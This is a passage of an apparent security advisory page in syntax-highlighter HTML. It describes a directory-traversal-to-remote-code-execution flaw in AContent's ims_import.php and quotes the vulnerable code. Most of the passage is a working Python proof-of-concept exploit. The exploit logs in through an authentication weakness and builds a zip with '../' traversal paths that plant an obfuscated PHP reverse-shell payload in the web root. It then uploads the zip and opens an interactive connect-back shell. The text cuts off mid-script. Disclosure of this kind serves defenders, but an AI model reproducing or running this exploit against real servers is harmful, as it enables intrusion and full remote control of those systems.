id=\"crayon-591b7aecb0f95111606370-216\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-m\">global<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">s<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-217\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">requests<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">Session<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-218\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">banner<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-219\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">validation_of_args_are_good<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-220\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">we_can_login<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-221\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;(+) logged in successfully&#8230;&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-222\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;(+) finding full path&#8230;&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-223\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">we_can_get_fp<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-224\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;(!) found the path at: %s&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">fp<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-225\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;(+) uploading shell&#8230;&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-226\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">we_can_upload_a_shell<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-227\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;(!) shell upload successful, launching!&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-228\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">instance<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">threaded_tcp_server<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;0.0.0.0&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">cb_port<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">connect_back_shell<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-229\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">cbserver<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">threading<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">Thread<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">instance<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">serve_forever<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-230\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">cbserver<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">daemon<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">True<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-231\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">cbserver<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">start<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-232\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">pop_shell<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-233\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">else<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-234\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">print <\/span><span class=\"crayon-e\">help_str<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-235\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-236\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-237\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">__name__<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;__main__&#8217;<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-238\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">main<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0251 seconds] -->  <\/p>\n<p><strong>Directory Traversal that lead to Remote Code Execution \u2013 <em>ims_import.php<\/em><\/strong><br \/> AContent is vulnerable to a Directory Traversal vulnerability that lead to a Remote Code Execution. The vulnerable code can be found in file <em>ims_import.php<\/em><\/p>\n<p>Vulnerable code can be found in lines 896-899 in <em>home\/ims\/ims_import.php<\/em><\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-591b7aecb0f9d964353347\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> $archive = new PclZip($_FILES[&#8216;file&#8217;][&#8216;tmp_name&#8217;]);    if ($archive-&gt;extract(  PCLZIP_OPT_PATH,        $import_path,                                                  PCLZIP_CB_PRE_EXTRACT,  &#8216;preImportCallBack&#8217;) == 0) {<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f9d964353347-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f9d964353347-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f9d964353347-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f9d964353347-4\">4<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f9d964353347-1\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">archive<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">PclZip<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">_FILES<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;file&#8217;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;tmp_name&#8217;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f9d964353347-2\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f9d964353347-3\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">archive<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-e\">extract<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">PCLZIP_OPT_PATH<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">import_path<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f9d964353347-4\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">PCLZIP_CB_PRE_EXTRACT<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;preImportCallBack&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0008 seconds] -->  <\/p>\n<p>This code calls <em>extract()<\/em> on a user supplied uploaded zip file. The <em>preImportCallBack()<\/em> does not check for directory traversals and performs a blacklist check on <em>teh<\/em> file extension. This can be used to write into the web root and gain remote code execution.<\/p>\n<p><u>Notes:<\/u><\/p>\n<ul>\n<li>Requires that the target has target has <em>display_errors=On<\/em> in the <em>php.ini<\/em><\/li>\n<li>Requires that you use an author account, but open registration is enabled by default<\/li>\n<li>Requires that you have at least one writable directory in the web-root, this is common<\/li>\n<\/ul>\n<p><strong>Proof of Concept<\/strong><\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-591b7aecb0fa1726489437\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-mixed-highlight\" title=\"Contains Mixed Languages\"><\/span><\/p>\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> #!\/usr\/local\/bin\/python    import re  import os  import sys  import time  import select  import string  import random  import zipfile  import termios  import hashlib  import requests  import threading  import SocketServer  from cStringIO import StringIO    # interactive connectback listener  class connect_back_shell(SocketServer.BaseRequestHandler):      &#8220;&#8221;&#8221;      our interactive, shell like client      &#8220;&#8221;&#8221;      def handle(self):          s = self.request          old_settings = termios.tcgetattr(0)          try:              c = True              self.close = 0              while not self.close:                  for i in select.select([0, s.fileno()], [], [], 0)[0]:                      c = os.read(i, 2048)                      if c:                          os.write(s.fileno() if i == 0 else 1, c)                          if i == 0:                              if &#8220;exit&#8221; in c or &#8220;quit&#8221; in c:                                  self.terminate()              s.close()          except KeyboardInterrupt:              return          finally:               termios.tcsetattr(0, termios.TCSADRAIN, old_settings)            return          def terminate(self,):          self.close = 1          self.server.shutdown()    class threaded_tcp_server(SocketServer.ThreadingMixIn, SocketServer.TCPServer):      pass    def banner():      print &#8220;nt| &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212; |&#8221;      print &#8220;t| AContent &lt;= 1.3 ims_import.php Remote Code Execution Vulnerability |&#8221;      print &#8220;t| &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;|n&#8221;    def _get_hashed_password(token):      &#8220;&#8221;&#8221;      takes advantage of the authentication weakness and generates       the hash as the server expects it, see client side code      &#8220;&#8221;&#8221;      s2 = hashlib.sha1()      s1 = hashlib.sha1()      s1.update(password)      hash_stage_1 = s1.hexdigest()      s2.update(&#8220;%s%s&#8221; % (hash_stage_1, token))      return s2.hexdigest()    def _build_php_code():      phpkode  = (&#8220;&#8221;&#8221;      @set_time_limit(0); @ignore_user_abort(1); @ini_set(&#8216;max_execution_time&#8217;,0);&#8221;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;$dis=@ini_get(&#8216;disable_functions&#8217;);&#8221;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;if(!empty($dis)){$dis=preg_replace(&#8216;\/[, ]+\/&#8217;, &#8216;,&#8217;, $dis);$dis=explode(&#8216;,&#8217;, $dis);&#8221;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;$dis=array_map(&#8216;trim&#8217;, $dis);}else{$dis=array();} &#8220;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;if(!function_exists(&#8216;LcNIcoB&#8217;)){function LcNIcoB($c){ &#8220;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;global $dis;if (FALSE !== strpos(strtolower(PHP_OS), &#8216;win&#8217; )) {$c=$c.&#8221; 2&gt;&amp;1\\n&#8221;;} &#8220;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;$imARhD=&#8217;is_callable&#8217;;$kqqI=&#8217;in_array&#8217;;&#8221;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;if($imARhD(&#8216;popen&#8217;)and!$kqqI(&#8216;popen&#8217;,$dis)){$fp=popen($c,&#8217;r&#8217;);&#8221;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;$o=NULL;if(is_resource($fp)){while(!feof($fp)){ &#8220;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;$o.=fread($fp,1024);}}@pclose($fp);}else&#8221;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;if($imARhD(&#8216;proc_open&#8217;)and!$kqqI(&#8216;proc_open&#8217;,$dis)){ &#8220;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;$handle=proc_open($c,array(array(pipe,&#8217;r&#8217;),array(pipe,&#8217;w&#8217;),array(pipe,&#8217;w&#8217;)),$pipes); &#8220;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;$o=NULL;while(!feof($pipes[1])){$o.=fread($pipes[1],1024);} &#8220;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;@proc_close($handle);}else if($imARhD(&#8216;system&#8217;)and!$kqqI(&#8216;system&#8217;,$dis)){ &#8220;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;ob_start();system($c);$o=ob_get_contents();ob_end_clean(); &#8220;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;}else if($imARhD(&#8216;passthru&#8217;)and!$kqqI(&#8216;passthru&#8217;,$dis)){ob_start();passthru($c); &#8220;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;$o=ob_get_contents();ob_end_clean(); &#8220;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;}else if($imARhD(&#8216;shell_exec&#8217;)and!$kqqI(&#8216;shell_exec&#8217;,$dis)){ &#8220;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;$o=shell_exec($c);}else if($imARhD(&#8216;exec&#8217;)and!$kqqI(&#8216;exec&#8217;,$dis)){ &#8220;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;$o=array();exec($c,$o);$o=join(chr(10),$o).chr(10);}else{$o=0;}return $o;}} &#8220;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;$nofuncs=&#8217;no exec functions&#8217;; &#8220;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;if(is_callable(&#8216;fsockopen&#8217;)and!in_array(&#8216;fsockopen&#8217;,$dis)){ &#8220;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;$s=@fsockopen(&#8216;tcp:\/\/%s&#8217;,&#8217;%s&#8217;);while($c=fread($s,2048)){$out = &#8221;; &#8220;&#8221;&#8221; % (cb_host, cb_port))      phpkode += (&#8220;&#8221;&#8221;if(substr($c,0,3) == &#8216;cd &#8216;){chdir(substr($c,3,-1)); &#8220;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;}elseif (substr($c,0,4) == &#8216;quit&#8217; || substr($c,0,4) == &#8216;exit&#8217;){break;}else{ &#8220;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;$out=LcNIcoB(substr($c,0,-1));if($out===false){fwrite($s,$nofuncs); &#8220;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;break;}}fwrite($s,$out);}fclose($s);}else{ &#8220;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;$s=@socket_create(AF_INET,SOCK_STREAM,SOL_TCP);@socket_connect($s,&#8217;%s&#8217;,&#8217;%s&#8217;); &#8220;&#8221;&#8221; % (cb_host, cb_port))      phpkode += (&#8220;&#8221;&#8221;@socket_write($s,&#8221;socket_create&#8221;);while($c=@socket_read($s,2048)){ &#8220;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;$out = &#8221;;if(substr($c,0,3) == &#8216;cd &#8216;){chdir(substr($c,3,-1)); &#8220;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;} else if (substr($c,0,4) == &#8216;quit&#8217; || substr($c,0,4) == &#8216;exit&#8217;) { &#8220;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;break;}else{$out=LcNIcoB(substr($c,0,-1));if($out===false){ &#8220;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;@socket_write($s,$nofuncs);break;}}@socket_write($s,$out,strlen($out)); &#8220;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;}@socket_close($s);} &#8220;&#8221;&#8221;)      return &#8220;&lt;?php %s ?&gt;&#8221; % phpkode        def we_can_login():      &#8220;&#8221;&#8221;      logs into the target      &#8220;&#8221;&#8221;      print &#8220;(+) getting server token&#8221;      r = s.get(&#8220;http:\/\/%s\/login.php&#8221; % target)      match = re.search(&#8220;) + &#8220;(.*)&#8221;)&#8221;, r.text)      if match:          print &#8220;(+) found the token&#8221;          print &#8220;(+) logging in as %s&#8230;&#8221; % username          data = {&#8216;form_password_hidden&#8217;: _get_hashed_password(match.group(1)), &#8216;form_login&#8217;: username, &#8216;submit&#8217;:&#8217;Login&#8217;}          r = s.post(&#8220;http:\/\/%s\/login.php&#8221; % target, data=data, allow_redirects=False)          if (r.status_code == 302) and (&#8220;index.php&#8221; in r.headers[&#8216;Location&#8217;]):              return True          else:              print &#8220;(-) failed to login, check your student password&#8221;      else:          print &#8220;(-) failed to get the token&#8221;      return False        def _build_zip():      &#8220;&#8221;&#8221;      builds the zip file.      we upload a .htaccess incase the webserver doesnt have       a handler for phtml extensions but typically, they do.      &#8220;&#8221;&#8221;      f = StringIO()      z = zipfile.ZipFile(f, &#8216;w&#8217;, zipfile.ZIP_DEFLATED)      z.writestr(&#8216;..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..%shome\/.htaccess&#8217; % fp, &#8220;AddType application\/x-httpd-php .phtml&#8221;)      z.writestr(&#8216;..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..%shome\/si.phtml&#8217; % fp, _build_php_code())      z.close()      handle = open(&#8216;pwn.zip&#8217;,&#8217;wb&#8217;)      handle.write(f.getvalue())      handle.close     def we_can_upload_a_shell():      &#8220;&#8221;&#8221;      uploads a zip file with php code inside to our target for exploitation      &#8220;&#8221;&#8221;      _build_zip()      multiple_files = {          &#8216;allow_test_import&#8217;: (None, &#8216;1&#8217;),           &#8216;allow_a4a_import&#8217;: (None, &#8216;1&#8217;),          &#8216;file&#8217;: (&#8216;pwn.zip&#8217;, open(&#8216;pwn.zip&#8217;,&#8217;rb&#8217;), &#8216;application\/zip&#8217;),          